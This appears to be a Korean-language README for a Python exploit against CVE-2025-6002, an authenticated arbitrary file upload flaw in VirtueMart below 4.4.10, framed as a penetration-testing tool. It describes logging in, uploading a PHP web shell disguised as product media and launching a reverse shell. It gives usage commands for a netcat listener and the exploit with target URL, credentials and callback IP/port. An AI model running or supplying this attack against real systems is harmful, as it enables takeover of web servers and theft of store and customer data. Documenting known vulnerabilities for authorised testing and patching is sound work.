
CVE-2025-6002를 대상으로 하는 Python 익스플로잇으로, VirtueMart < 4.4.10에서 인증된 임의 파일 업로드를 악용합니다. 로그인하고, PHP 웹셸을 업로드하며, 침투 테스트를 위한 리버스 셸을 트리거합니다.
이 스크립트는 VirtueMart < 4.4.10 (CVE-2025-6002)에서 발견된 인증된 임의 파일 업로드 취약점을 악용합니다. 해당 취약점은 이 블로그 게시물에 설명되어 있습니다: https://blog.blacklanternsecurity.com/p/doomla-zero-days
이 스크립트는 제공된 자격 증명으로 VirtueMart에 로그인하고, 새 제품을 생성한 후 미디어 파일로 PHP 웹쉘을 업로드합니다. 그런 다음 제공된 IP/포트로 리버스 셸을 실행합니다.
매개변수:
사용법:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337